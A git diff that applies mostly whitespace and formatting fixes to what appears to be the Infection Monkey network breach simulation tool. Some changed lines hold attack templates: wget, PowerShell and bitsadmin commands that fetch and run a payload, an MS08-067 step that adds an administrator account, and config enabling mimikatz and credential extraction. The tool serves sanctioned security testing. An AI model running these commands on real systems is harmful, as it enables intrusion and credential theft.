.../src/components/attack/techniques/T1016.js | 24 +- .../src/components/attack/techniques/T1018.js | 37 ++- .../src/components/attack/techniques/T1021.js | 22 +- .../src/components/attack/techniques/T1035.js | 10 +- .../src/components/attack/techniques/T1041.js | 16 +- .../src/components/attack/techniques/T1059.js | 27 +- .../src/components/attack/techniques/T1064.js | 10 +- .../src/components/attack/techniques/T1075.js | 29 +- .../src/components/attack/techniques/T1082.js | 24 +- .../src/components/attack/techniques/T1086.js | 27 +- .../src/components/attack/techniques/T1090.js | 17 +- .../src/components/attack/techniques/T1105.js | 21 +- .../src/components/attack/techniques/T1106.js | 10 +- .../src/components/attack/techniques/T1107.js | 32 ++- .../src/components/attack/techniques/T1110.js | 28 +- .../src/components/attack/techniques/T1129.js | 8 +- .../src/components/attack/techniques/T1145.js | 35 +-- .../src/components/attack/techniques/T1188.js | 33 ++- .../src/components/attack/techniques/T1197.js | 48 ++-- .../src/components/attack/techniques/T1210.js | 74 ++--- .../src/components/attack/techniques/T1222.js | 19 +- .../map/preview-pane/InfMapPreviewPane.js | 16 +- .../map/preview-pane/PreviewPane.js | 16 +- .../ui/src/components/pages/ConfigurePage.js | 254 ++++++++++-------- .../cc/ui/src/components/pages/LicensePage.js | 4 +- .../cc/ui/src/components/pages/MapPage.js | 25 +- .../components/pages/PassTheHashMapPage.js | 8 +- .../cc/ui/src/components/pages/ReportPage.js | 187 +++++++------ .../ui/src/components/pages/RunMonkeyPage.js | 49 ++-- .../ui/src/components/pages/StartOverPage.js | 15 +- .../ui/src/components/pages/TelemetryPage.js | 66 ++--- .../common/PaginatedTable.js | 3 +- .../security/AttackReport.js | 55 ++-- .../security/BreachedServers.js | 10 +- .../report-components/security/PostBreach.js | 30 +-- .../security/ScannedServers.js | 14 +- .../security/StolenPasswords.js | 6 +- .../report-components/security/StrongUsers.js | 8 +- 
.../zerotrust/EventsButton.js | 14 +- .../zerotrust/EventsModal.js | 6 +- .../zerotrust/EventsTimeline.js | 4 +- .../zerotrust/PillarLabel.js | 3 +- .../zerotrust/PrinciplesStatusTable.js | 13 +- .../zerotrust/ReportLegend.js | 8 +- .../zerotrust/SinglePillarPrinciplesStatus.js | 6 +- .../zerotrust/StatusesToPillarsSummary.js | 10 +- .../zerotrust/SummarySection.js | 7 +- .../src/components/run-monkey/AwsRunTable.js | 12 +- .../src/components/ui-components/Checkbox.js | 99 +++---- monkey/monkey_island/cc/ui/src/config/base.js | 3 +- .../cc/ui/src/images/infection-monkey.svg | 47 ++-- .../cc/ui/src/images/monkey-icon.svg | 11 +- .../zerotrust/im-alert-machine-icon.svg | 14 +- .../zerotrust/im-alert-network-icon.svg | 24 +- monkey/monkey_island/cc/ui/src/index.html | 2 +- monkey/monkey_island/cc/ui/src/index.js | 2 +- .../cc/ui/src/server_config/AwsConfig.js | 2 +- .../cc/ui/src/server_config/PasswordConfig.js | 2 +- .../cc/ui/src/server_config/StandardConfig.js | 2 +- .../cc/ui/src/services/AuthService.js | 5 +- monkey/monkey_island/cc/ui/src/styles/App.css | 37 +-- .../cc/ui/src/styles/Checkbox.scss | 137 +++++----- .../cc/ui/src/styles/Collapse.scss | 13 +- monkey/monkey_island/cc/utils.py | 2 +- 147 files changed, 1370 insertions(+), 1150 deletions(-) diff --git a/monkey/infection_monkey/dropper.py b/monkey/infection_monkey/dropper.py index 0fc6dd10a..55a359b60 100644 --- a/monkey/infection_monkey/dropper.py +++ b/monkey/infection_monkey/dropper.py @@ -114,7 +114,7 @@ class MonkeyDrops(object): except OSError: LOG.warning("Cannot set reference date to destination file") - monkey_options =\ + monkey_options = \ build_monkey_commandline_explicitly(self.opts.parent, self.opts.tunnel, self.opts.server, self.opts.depth) if OperatingSystem.Windows == SystemInfoCollector.get_os(): diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf index 194e18625..4fb0200c8 100644 --- a/monkey/infection_monkey/example.conf 
+++ b/monkey/infection_monkey/example.conf 
@@ -1,109 +1,109 @@ { - "should_exploit": true, - "command_servers": [ - "192.0.2.0:5000" - ], - "internet_services": [ - "monkey.guardicore.com", - "www.google.com" - ], - "keep_tunnel_open_time": 60, - "subnet_scan_list": [ + "should_exploit": true, + "command_servers": [ + "192.0.2.0:5000" + ], + "internet_services": [ + "monkey.guardicore.com", + "www.google.com" + ], + "keep_tunnel_open_time": 60, + "subnet_scan_list": [ - ], - "inaccessible_subnets": [], - "blocked_ips": [], - "current_server": "192.0.2.0:5000", - "alive": true, - "collect_system_info": true, - "extract_azure_creds": true, - "should_use_mimikatz": true, - "depth": 2, + ], + "inaccessible_subnets": [], + "blocked_ips": [], + "current_server": "192.0.2.0:5000", + "alive": true, + "collect_system_info": true, + "extract_azure_creds": true, + "should_use_mimikatz": true, + "depth": 2, - "dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll", - "dropper_date_reference_path_linux": "/bin/sh", - "dropper_log_path_windows": "%temp%\\~df1562.tmp", - "dropper_log_path_linux": "/tmp/user-1562", - "dropper_set_date": true, - "dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe", - "dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe", - "dropper_target_path_linux": "/tmp/monkey", + "dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll", + "dropper_date_reference_path_linux": "/bin/sh", + "dropper_log_path_windows": "%temp%\\~df1562.tmp", + "dropper_log_path_linux": "/tmp/user-1562", + "dropper_set_date": true, + "dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe", + "dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe", + "dropper_target_path_linux": "/tmp/monkey", - "monkey_dir_name": "monkey_dir", + "monkey_dir_name": "monkey_dir", - "kill_file_path_linux": "/var/run/monkey.not", - "kill_file_path_windows": "%windir%\\monkey.not", - "dropper_try_move_first": true, - "exploiter_classes": [ - "SSHExploiter", - "SmbExploiter", 
- "WmiExploiter", - "ShellShockExploiter", - "ElasticGroovyExploiter", - "SambaCryExploiter", - "Struts2Exploiter", - "WebLogicExploiter", - "HadoopExploiter", - "VSFTPDExploiter", - "MSSQLExploiter" - ], - "finger_classes": [ - "SSHFinger", - "PingScanner", - "HTTPFinger", - "SMBFinger", - "MySQLFinger", - "MSSQLFingerprint", - "ElasticFinger" - ], - "max_iterations": 3, - "monkey_log_path_windows": "%temp%\\~df1563.tmp", - "monkey_log_path_linux": "/tmp/user-1563", - "send_log_to_server": true, - "ms08_067_exploit_attempts": 5, - "user_to_add": "Monkey_IUSER_SUPPORT", - "remote_user_pass": "Password1!", - "ping_scan_timeout": 10000, - "smb_download_timeout": 300, - "smb_service_name": "InfectionMonkey", - "retry_failed_explotation": true, - "self_delete_in_cleanup": true, - "serialize_config": false, - "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}", - "skip_exploit_if_file_exist": false, - "exploit_user_list": [], - "exploit_password_list": [], - "exploit_lm_hash_list": [], - "exploit_ntlm_hash_list": [], - "exploit_ssh_keys": [], - "sambacry_trigger_timeout": 5, - "sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"], - "sambacry_shares_not_to_check": ["IPC$", "print$"], - "local_network_scan": false, - "tcp_scan_get_banner": true, - "tcp_scan_interval": 0, - "tcp_scan_timeout": 10000, - "tcp_target_ports": [ - 22, - 445, - 135, - 3389, - 80, - 8080, - 443, - 3306, - 8008, - 9200, - 7001, - 8088 - ], - "timeout_between_iterations": 10, - "use_file_logging": true, - "victims_max_exploit": 15, - "victims_max_find": 100, - "post_breach_actions" : [] - custom_PBA_linux_cmd = "" - custom_PBA_windows_cmd = "" - PBA_linux_filename = None - PBA_windows_filename = None + "kill_file_path_linux": "/var/run/monkey.not", + "kill_file_path_windows": "%windir%\\monkey.not", + "dropper_try_move_first": true, + "exploiter_classes": [ + "SSHExploiter", + "SmbExploiter", + "WmiExploiter", + 
"ShellShockExploiter", + "ElasticGroovyExploiter", + "SambaCryExploiter", + "Struts2Exploiter", + "WebLogicExploiter", + "HadoopExploiter", + "VSFTPDExploiter", + "MSSQLExploiter" + ], + "finger_classes": [ + "SSHFinger", + "PingScanner", + "HTTPFinger", + "SMBFinger", + "MySQLFinger", + "MSSQLFingerprint", + "ElasticFinger" + ], + "max_iterations": 3, + "monkey_log_path_windows": "%temp%\\~df1563.tmp", + "monkey_log_path_linux": "/tmp/user-1563", + "send_log_to_server": true, + "ms08_067_exploit_attempts": 5, + "user_to_add": "Monkey_IUSER_SUPPORT", + "remote_user_pass": "Password1!", + "ping_scan_timeout": 10000, + "smb_download_timeout": 300, + "smb_service_name": "InfectionMonkey", + "retry_failed_explotation": true, + "self_delete_in_cleanup": true, + "serialize_config": false, + "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}", + "skip_exploit_if_file_exist": false, + "exploit_user_list": [], + "exploit_password_list": [], + "exploit_lm_hash_list": [], + "exploit_ntlm_hash_list": [], + "exploit_ssh_keys": [], + "sambacry_trigger_timeout": 5, + "sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"], + "sambacry_shares_not_to_check": ["IPC$", "print$"], + "local_network_scan": false, + "tcp_scan_get_banner": true, + "tcp_scan_interval": 0, + "tcp_scan_timeout": 10000, + "tcp_target_ports": [ + 22, + 445, + 135, + 3389, + 80, + 8080, + 443, + 3306, + 8008, + 9200, + 7001, + 8088 + ], + "timeout_between_iterations": 10, + "use_file_logging": true, + "victims_max_exploit": 15, + "victims_max_find": 100, + "post_breach_actions": [] + custom_PBA_linux_cmd = "" + custom_PBA_windows_cmd = "" + PBA_linux_filename = None + PBA_windows_filename = None } diff --git a/monkey/infection_monkey/exploit/elasticgroovy.py b/monkey/infection_monkey/exploit/elasticgroovy.py index c8f897dd2..f66a58ab0 100644 --- a/monkey/infection_monkey/exploit/elasticgroovy.py 
+++ b/monkey/infection_monkey/exploit/elasticgroovy.py @@ -8,7 +8,7 @@ import json import logging import requests from infection_monkey.exploit.web_rce import WebRCE -from infection_monkey.model import WGET_HTTP_UPLOAD, BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX,\ +from infection_monkey.model import WGET_HTTP_UPLOAD, BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX, \ DOWNLOAD_TIMEOUT from infection_monkey.network.elasticfinger import ES_PORT from common.data.network_consts import ES_SERVICE @@ -83,7 +83,7 @@ class ElasticGroovyExploiter(WebRCE): # Overridden web_rce method that adds CMD prefix for windows command try: if 'windows' in self.host.os['type']: - resp = self.exploit(url, CMD_PREFIX+" "+CHECK_COMMAND) + resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND) else: resp = self.exploit(url, CHECK_COMMAND) if resp is True: diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index dcad2adf1..c8982a7e2 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -17,7 +17,6 @@ LOG = logging.getLogger(__name__) class MSSQLExploiter(HostExploiter): - _EXPLOITED_SERVICE = 'MSSQL' _TARGET_OS_TYPE = ['windows'] EXPLOIT_TYPE = ExploitType.BRUTE_FORCE @@ -143,7 +142,7 @@ class MSSQLExploiter(HostExploiter): def get_monkey_download_command(self): dst_path = get_monkey_dest_path(self.monkey_server.http_path) - monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.\ + monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND. \ format(http_path=self.monkey_server.http_path, dst_path=dst_path) prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path) 
@@ -192,5 +191,5 @@ class MSSQLLimitedSizePayload(LimitedSizePayload): def __init__(self, command, prefix="", suffix=""): super(MSSQLLimitedSizePayload, self).__init__(command=command, max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE, - prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START+prefix, - suffix=suffix+MSSQLExploiter.XP_CMDSHELL_COMMAND_END) + prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START + prefix, + suffix=suffix + MSSQLExploiter.XP_CMDSHELL_COMMAND_END) diff --git a/monkey/infection_monkey/exploit/shellshock.py b/monkey/infection_monkey/exploit/shellshock.py index edc4851e9..932d94b77 100644 --- a/monkey/infection_monkey/exploit/shellshock.py +++ b/monkey/infection_monkey/exploit/shellshock.py @@ -132,7 +132,7 @@ class ShellShockExploiter(HostExploiter): self._remove_lock_file(exploit, url, header) if (http_thread.downloads != 1) or ( - 'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): + 'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) continue diff --git a/monkey/infection_monkey/exploit/tools/exceptions.py b/monkey/infection_monkey/exploit/tools/exceptions.py index eabe8d9d7..d37ab9e53 100644 --- a/monkey/infection_monkey/exploit/tools/exceptions.py +++ b/monkey/infection_monkey/exploit/tools/exceptions.py @@ -1,5 +1,3 @@ - - class ExploitingVulnerableMachineError(Exception): """ Raise when exploiter failed, but machine is vulnerable""" pass diff --git a/monkey/infection_monkey/exploit/tools/helpers.py b/monkey/infection_monkey/exploit/tools/helpers.py index 91a25c270..5e4b43b20 100644 --- a/monkey/infection_monkey/exploit/tools/helpers.py +++ b/monkey/infection_monkey/exploit/tools/helpers.py 
@@ -74,7 +74,7 @@ def get_target_monkey(host): if host.os.get('type') == platform.system().lower(): # if exe not found, and we have the same arch or arch is unknown and we are 32bit, use our exe if (not host.os.get('machine') and sys.maxsize < 2 ** 32) or \ - host.os.get('machine', '').lower() == platform.machine().lower(): + host.os.get('machine', '').lower() == platform.machine().lower(): monkey_path = sys.executable return monkey_path diff --git a/monkey/infection_monkey/exploit/tools/payload_parsing.py b/monkey/infection_monkey/exploit/tools/payload_parsing.py index 31632b045..5c4415fe3 100644 --- a/monkey/infection_monkey/exploit/tools/payload_parsing.py +++ b/monkey/infection_monkey/exploit/tools/payload_parsing.py @@ -49,7 +49,7 @@ class LimitedSizePayload(Payload): "exceeds required length of command.") elif self.command == "": - return [self.prefix+self.suffix] + return [self.prefix + self.suffix] wrapper = textwrap.TextWrapper(drop_whitespace=False, width=self.get_max_sub_payload_length()) commands = [self.get_payload(part) for part diff --git a/monkey/infection_monkey/exploit/tools/smb_tools.py b/monkey/infection_monkey/exploit/tools/smb_tools.py index 51564518e..2507cff66 100644 --- a/monkey/infection_monkey/exploit/tools/smb_tools.py +++ b/monkey/infection_monkey/exploit/tools/smb_tools.py @@ -12,6 +12,7 @@ from common.utils.attack_utils import ScanStatus from infection_monkey.telemetry.attack.t1105_telem import T1105Telem from infection_monkey.exploit.tools.helpers import get_interface_to_target from infection_monkey.config import Configuration + __author__ = 'itamar' LOG = logging.getLogger(__name__) diff --git a/monkey/infection_monkey/exploit/weblogic.py b/monkey/infection_monkey/exploit/weblogic.py index ac648012b..daccb4cfb 100644 --- a/monkey/infection_monkey/exploit/weblogic.py +++ b/monkey/infection_monkey/exploit/weblogic.py @@ -1,4 +1,3 @@ - import threading import logging import time 
@@ -13,7 +12,6 @@ from infection_monkey.exploit.tools.helpers import get_interface_to_target from infection_monkey.network.info import get_free_tcp_port from http.server import BaseHTTPRequestHandler, HTTPServer - __author__ = "VakarisZ" LOG = logging.getLogger(__name__) @@ -34,7 +32,6 @@ HEADERS = { class WebLogicExploiter(HostExploiter): - _TARGET_OS_TYPE = ['linux', 'windows'] _EXPLOITED_SERVICE = 'Weblogic' diff --git a/monkey/infection_monkey/exploit/win_ms08_067.py b/monkey/infection_monkey/exploit/win_ms08_067.py index 7148ba965..4257677b0 100644 --- a/monkey/infection_monkey/exploit/win_ms08_067.py +++ b/monkey/infection_monkey/exploit/win_ms08_067.py @@ -162,11 +162,11 @@ class Ms08_067_Exploiter(HostExploiter): def is_os_supported(self): if self.host.os.get('type') in self._TARGET_OS_TYPE and \ - self.host.os.get('version') in list(self._windows_versions.keys()): + self.host.os.get('version') in list(self._windows_versions.keys()): return True if not self.host.os.get('type') or ( - self.host.os.get('type') in self._TARGET_OS_TYPE and not self.host.os.get('version')): + self.host.os.get('type') in self._TARGET_OS_TYPE and not self.host.os.get('version')): is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445) if is_smb_open: smb_finger = SMBFinger() @@ -193,9 +193,9 @@ class Ms08_067_Exploiter(HostExploiter): sock.send("cmd /c (net user {} {} /add) &&" " (net localgroup administrators {} /add)\r\n".format( - self._config.user_to_add, - self._config.remote_user_pass, - self._config.user_to_add).encode()) + self._config.user_to_add, + self._config.remote_user_pass, + self._config.user_to_add).encode()) time.sleep(2) reply = sock.recv(1000) diff --git a/monkey/infection_monkey/exploit/wmiexec.py b/monkey/infection_monkey/exploit/wmiexec.py index 257cfd469..cc286bfcd 100644 --- a/monkey/infection_monkey/exploit/wmiexec.py +++ b/monkey/infection_monkey/exploit/wmiexec.py @@ -122,4 +122,3 @@ class WmiExploiter(HostExploiter): return success return False - 
diff --git a/monkey/infection_monkey/model/__init__.py b/monkey/infection_monkey/model/__init__.py index 254bce966..e4cfea7a4 100644 --- a/monkey/infection_monkey/model/__init__.py +++ b/monkey/infection_monkey/model/__init__.py @@ -5,14 +5,14 @@ __author__ = 'itamar' MONKEY_ARG = "m0nk3y" DROPPER_ARG = "dr0pp3r" ID_STRING = "M0NK3Y3XPL0ITABLE" -DROPPER_CMDLINE_WINDOWS = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, ) -MONKEY_CMDLINE_WINDOWS = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, ) -MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG, ) +DROPPER_CMDLINE_WINDOWS = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG,) +MONKEY_CMDLINE_WINDOWS = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG,) +MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG,) GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)' -DROPPER_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, ) -MONKEY_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, ) +DROPPER_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG,) +MONKEY_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG,) MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd ' \ - '/c %%(monkey_path)s %s"' % (MONKEY_ARG, ) + '/c %%(monkey_path)s %s"' % (MONKEY_ARG,) DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(' \ 'file_path)s exit)) > NUL 2>&1 ' 
@@ -33,12 +33,12 @@ GET_ARCH_LINUX = "lscpu" # All in one commands (upload, change permissions, run) HADOOP_WINDOWS_COMMAND = "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " \ - "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \ - " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \ - "{& %(monkey_path)s %(monkey_type)s %(parameters)s } \"" + "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \ + " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \ + "{& %(monkey_path)s %(monkey_type)s %(parameters)s } \"" HADOOP_LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \ - "&& wget -O %(monkey_path)s %(http_path)s " \ - "; chmod +x %(monkey_path)s " \ - "&& %(monkey_path)s %(monkey_type)s %(parameters)s" + "&& wget -O %(monkey_path)s %(http_path)s " \ + "; chmod +x %(monkey_path)s " \ + "&& %(monkey_path)s %(monkey_type)s %(parameters)s" DOWNLOAD_TIMEOUT = 180 diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py index 3985c8a2e..a74c497af 100644 --- a/monkey/infection_monkey/monkey.py +++ b/monkey/infection_monkey/monkey.py @@ -182,7 +182,7 @@ class InfectionMonkey(object): if self._default_server: if self._network.on_island(self._default_server): machine.set_default_server(get_interface_to_target(machine.ip_addr) + - (':'+self._default_server_port if self._default_server_port else '')) + (':' + self._default_server_port if self._default_server_port else '')) else: machine.set_default_server(self._default_server) LOG.debug("Default server for machine: %r set to %s" % (machine, machine.default_server)) diff --git a/monkey/infection_monkey/network/info.py b/monkey/infection_monkey/network/info.py index 2d7b981f5..1418c22cc 100644 --- a/monkey/infection_monkey/network/info.py +++ b/monkey/infection_monkey/network/info.py 
@@ -13,7 +13,6 @@ from requests import ConnectionError from common.network.network_range import CidrRange from infection_monkey.utils.environment import is_windows_os - # Timeout for monkey connections TIMEOUT = 15 LOOPBACK_NAME = b"lo" diff --git a/monkey/infection_monkey/network/mssql_fingerprint.py b/monkey/infection_monkey/network/mssql_fingerprint.py index e6130732d..623b7368f 100644 --- a/monkey/infection_monkey/network/mssql_fingerprint.py +++ b/monkey/infection_monkey/network/mssql_fingerprint.py @@ -12,7 +12,6 @@ LOG = logging.getLogger(__name__) class MSSQLFinger(HostFinger): - # Class related consts SQL_BROWSER_DEFAULT_PORT = 1434 BUFFER_SIZE = 4096 diff --git a/monkey/infection_monkey/network/tcp_scanner.py b/monkey/infection_monkey/network/tcp_scanner.py index fa2d812ae..3df936672 100644 --- a/monkey/infection_monkey/network/tcp_scanner.py +++ b/monkey/infection_monkey/network/tcp_scanner.py @@ -11,7 +11,6 @@ BANNER_READ = 1024 class TcpScanner(HostScanner, HostFinger): - _SCANNED_SERVICE = 'unknown(TCP)' def __init__(self): diff --git a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py index 89417757d..3438eccda 100644 --- a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py +++ b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py @@ -27,6 +27,7 @@ class UsersPBA(PBA): """ Defines user's configured post breach action. """ + def __init__(self): super(UsersPBA, self).__init__(POST_BREACH_FILE_EXECUTION) self.filename = '' diff --git a/monkey/infection_monkey/post_breach/pba.py b/monkey/infection_monkey/post_breach/pba.py index 73b8a3221..57bf0aaf7 100644 --- a/monkey/infection_monkey/post_breach/pba.py +++ b/monkey/infection_monkey/post_breach/pba.py 
@@ -7,7 +7,6 @@ from infection_monkey.utils.environment import is_windows_os from infection_monkey.config import WormConfiguration from infection_monkey.telemetry.attack.t1064_telem import T1064Telem - LOG = logging.getLogger(__name__) __author__ = 'VakarisZ' @@ -19,6 +18,7 @@ class PBA(object): """ Post breach action object. Can be extended to support more than command execution on target machine. """ + def __init__(self, name="unknown", linux_cmd="", windows_cmd=""): """ :param name: Name of post breach action. diff --git a/monkey/infection_monkey/post_breach/post_breach_handler.py b/monkey/infection_monkey/post_breach/post_breach_handler.py index b5dfa93c7..78ee4ad42 100644 --- a/monkey/infection_monkey/post_breach/post_breach_handler.py +++ b/monkey/infection_monkey/post_breach/post_breach_handler.py @@ -16,6 +16,7 @@ class PostBreach(object): """ This class handles post breach actions execution """ + def __init__(self): self.os_is_linux = not is_windows_os() self.pba_list = self.config_to_pba_list() diff --git a/monkey/infection_monkey/pyinstaller_utils.py b/monkey/infection_monkey/pyinstaller_utils.py index d169bda6a..3e2bed17e 100644 --- a/monkey/infection_monkey/pyinstaller_utils.py +++ b/monkey/infection_monkey/pyinstaller_utils.py @@ -1,7 +1,6 @@ import os import sys - __author__ = 'itay.mizeretz' diff --git a/monkey/infection_monkey/system_info/linux_info_collector.py b/monkey/infection_monkey/system_info/linux_info_collector.py index 831b10ba1..fb38f84c4 100644 --- a/monkey/infection_monkey/system_info/linux_info_collector.py +++ b/monkey/infection_monkey/system_info/linux_info_collector.py @@ -26,4 +26,3 @@ class LinuxInfoCollector(InfoCollector): super(LinuxInfoCollector, self).get_info() self.info['ssh_info'] = SSHCollector.get_info() return self.info - diff --git a/monkey/infection_monkey/system_info/windows_info_collector.py b/monkey/infection_monkey/system_info/windows_info_collector.py index 2c3696f44..1419478db 100644 
--- a/monkey/infection_monkey/system_info/windows_info_collector.py +++ b/monkey/infection_monkey/system_info/windows_info_collector.py @@ -1,6 +1,7 @@ import os import logging import sys + sys.coinit_flags = 0 # needed for proper destruction of the wmi python module import infection_monkey.config diff --git a/monkey/infection_monkey/system_info/wmi_consts.py b/monkey/infection_monkey/system_info/wmi_consts.py index a87e297d9..a42472b82 100644 --- a/monkey/infection_monkey/system_info/wmi_consts.py +++ b/monkey/infection_monkey/system_info/wmi_consts.py @@ -29,4 +29,3 @@ WMI_LDAP_CLASSES = {"ds_user": ("DS_sAMAccountName", "DS_userPrincipalName", "DS_sAMAccountType", "DS_servicePrincipalName", "DS_userAccountControl", "DS_whenChanged", "DS_whenCreated"), } - diff --git a/monkey/infection_monkey/system_singleton.py b/monkey/infection_monkey/system_singleton.py index 485a9253e..f82e7be44 100644 --- a/monkey/infection_monkey/system_singleton.py +++ b/monkey/infection_monkey/system_singleton.py @@ -5,7 +5,6 @@ from abc import ABCMeta, abstractmethod from infection_monkey.config import WormConfiguration - __author__ = 'itamar' LOG = logging.getLogger(__name__) diff --git a/monkey/infection_monkey/transport/__init__.py b/monkey/infection_monkey/transport/__init__.py index 735ef670a..25509ef85 100644 --- a/monkey/infection_monkey/transport/__init__.py +++ b/monkey/infection_monkey/transport/__init__.py @@ -1,4 +1,3 @@ from infection_monkey.transport.http import HTTPServer, LockedHTTPServer - __author__ = 'hoffer' diff --git a/monkey/infection_monkey/transport/tcp.py b/monkey/infection_monkey/transport/tcp.py index e910e657f..22cff5d4a 100644 --- a/monkey/infection_monkey/transport/tcp.py +++ b/monkey/infection_monkey/transport/tcp.py 
@@ -41,13 +41,13 @@ class SocketsPipe(Thread): except: break self._keep_connection = True - + self.source.close() self.dest.close() class TcpProxy(TransportProxyBase): - + def run(self): pipes = [] l_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py index 8ab61c895..9b5e7b849 100644 --- a/monkey/monkey_island/cc/app.py +++ b/monkey/monkey_island/cc/app.py @@ -39,7 +39,6 @@ from monkey_island.cc.resources.test.log_test import LogTest __author__ = 'Barak' - HOME_FILE = 'index.html' diff --git a/monkey/monkey_island/cc/island_logger.py b/monkey/monkey_island/cc/island_logger.py index 8fbef1e0e..f55fcf896 100644 --- a/monkey/monkey_island/cc/island_logger.py +++ b/monkey/monkey_island/cc/island_logger.py @@ -2,7 +2,6 @@ import os import json import logging.config - __author__ = 'Maor.Rayzin' diff --git a/monkey/monkey_island/cc/island_logger_default_config.json b/monkey/monkey_island/cc/island_logger_default_config.json index 34a57b374..522177cda 100644 --- a/monkey/monkey_island/cc/island_logger_default_config.json +++ b/monkey/monkey_island/cc/island_logger_default_config.json 
@@ -1,33 +1,33 @@ { - "version": 1, - "disable_existing_loggers": false, - "formatters": { - "simple": { - "format": "%(asctime)s - %(filename)s:%(lineno)s - %(funcName)10s() - %(levelname)s - %(message)s" - } - }, - - "handlers": { - "console": { - "class": "logging.StreamHandler", - "level": "DEBUG", - "formatter": "simple", - "stream": "ext://sys.stdout" - }, - - "info_file_handler": { - "class": "logging.handlers.RotatingFileHandler", - "level": "INFO", - "formatter": "simple", - "filename": "info.log", - "maxBytes": 10485760, - "backupCount": 20, - "encoding": "utf8" - } - }, - - "root": { - "level": "DEBUG", - "handlers": ["console", "info_file_handler"] + "version": 1, + "disable_existing_loggers": false, + "formatters": { + "simple": { + "format": "%(asctime)s - %(filename)s:%(lineno)s - %(funcName)10s() - %(levelname)s - %(message)s" } + }, + "handlers": { + "console": { + "class": "logging.StreamHandler", + "level": "DEBUG", + "formatter": "simple", + "stream": "ext://sys.stdout" + }, + "info_file_handler": { + "class": "logging.handlers.RotatingFileHandler", + "level": "INFO", + "formatter": "simple", + "filename": "info.log", + "maxBytes": 10485760, + "backupCount": 20, + "encoding": "utf8" + } + }, + "root": { + "level": "DEBUG", + "handlers": [ + "console", + "info_file_handler" + ] + } } \ No newline at end of file diff --git a/monkey/monkey_island/cc/main.py b/monkey/monkey_island/cc/main.py index c3c762dbc..17c537aeb 100644 --- a/monkey/monkey_island/cc/main.py +++ b/monkey/monkey_island/cc/main.py @@ -13,6 +13,7 @@ if BASE_PATH not in sys.path: from monkey_island.cc.island_logger import json_setup_logging from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH + # This is here in order to catch EVERYTHING, some functions are being called on imports the log init needs to be on top. json_setup_logging(default_path=os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc', 'island_logger_default_config.json'), default_level=logging.DEBUG) 
